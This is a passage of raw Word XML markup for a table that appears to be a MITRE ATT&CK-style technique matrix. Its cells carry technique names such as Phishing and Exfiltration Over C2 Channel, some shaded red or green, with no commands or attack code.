          <w:p w14:paraId="476D7632" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Deploy Container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4D5C3A59" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Boot or Logon Initialization Scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="66374E88" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Boot or Logon AutoStart Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72CCAE51" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Build Image on Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31483D62" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Exploitation for Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B679811" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Cloud Infrastructure Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="10419840" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Remote Service Session Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F7A7B15" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Automated Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58D0B86F" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Data Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A405210" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7099248C" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Data Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C32C3" w:rsidRPr="001019D3" w14:paraId="3A61695F" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5574EAD1" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Gather Victim Org Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01613C88" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Develop Capabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A5BD067" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Hardware Additions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F56AC39" w14:textId="127F1A2C" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004D0ABF" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>ESXi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve"> Administration Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B1A03E0" w14:textId="576D5BA2" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Cloud Application Integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70137FAA" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Boot or Logon Initialization Scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="37158E0D" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Debugger Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50F754C6" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Forced Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="445" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B7C17C8" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Cloud Service Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22A9240E" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Remote Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="369" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4DD9031A" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Browser Session Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1958EA5E" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Data Obfuscation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0323DD89" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Exfiltration Over Other Network Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="374" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11F68BE4" w14:textId="77777777" w:rsidR="004C32C3" w:rsidRPr="001019D3" w:rsidRDefault="004C32C3" w:rsidP="00EC026D">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Defacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D0ABF" w:rsidRPr="001019D3" w14:paraId="704E436B" w14:textId="77777777" w:rsidTr="00266236">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="412" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46142D30" w14:textId="77777777" w:rsidR="004D0ABF" w:rsidRPr="001019D3" w:rsidRDefault="004D0ABF" w:rsidP="004D0ABF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Phishing for Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="355" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F1675D0" w14:textId="77777777" w:rsidR="004D0ABF" w:rsidRPr="001019D3" w:rsidRDefault="004D0ABF" w:rsidP="004D0ABF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Establish Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BB26B33" w14:textId="77777777" w:rsidR="004D0ABF" w:rsidRPr="001019D3" w:rsidRDefault="004D0ABF" w:rsidP="004D0ABF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Phishing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="336" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="36C77E09" w14:textId="3F18A036" w:rsidR="004D0ABF" w:rsidRPr="001019D3" w:rsidRDefault="004D0ABF" w:rsidP="004D0ABF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Exploitation for Client Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E3AF883" w14:textId="6C629316" w:rsidR="004D0ABF" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="004D0ABF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Compromise Host Software Binary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="296" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="575C79E1" w14:textId="77777777" w:rsidR="004D0ABF" w:rsidRPr="001019D3" w:rsidRDefault="004D0ABF" w:rsidP="004D0ABF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
              <w:t>Create or Modify System Process</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="437" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="11BC80BC" w14:textId="7240F572" w:rsidR="004D0ABF" w:rsidRPr="001019D3" w:rsidRDefault="00E4115A" w:rsidP="004D0ABF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Delay Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="315" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="92D050"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07A37787" w14:textId="77777777" w:rsidR="004D0ABF" w:rsidRPr="001019D3" w:rsidRDefault="004D0ABF" w:rsidP="004D0ABF">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="57" w:right="57"/>
              <w:contextualSpacing/>
              <w:rPr>
                <w:sz w:val="13"/>
                <w:szCs w:val="13"/>
              </w:rPr>
            </w:pPr>
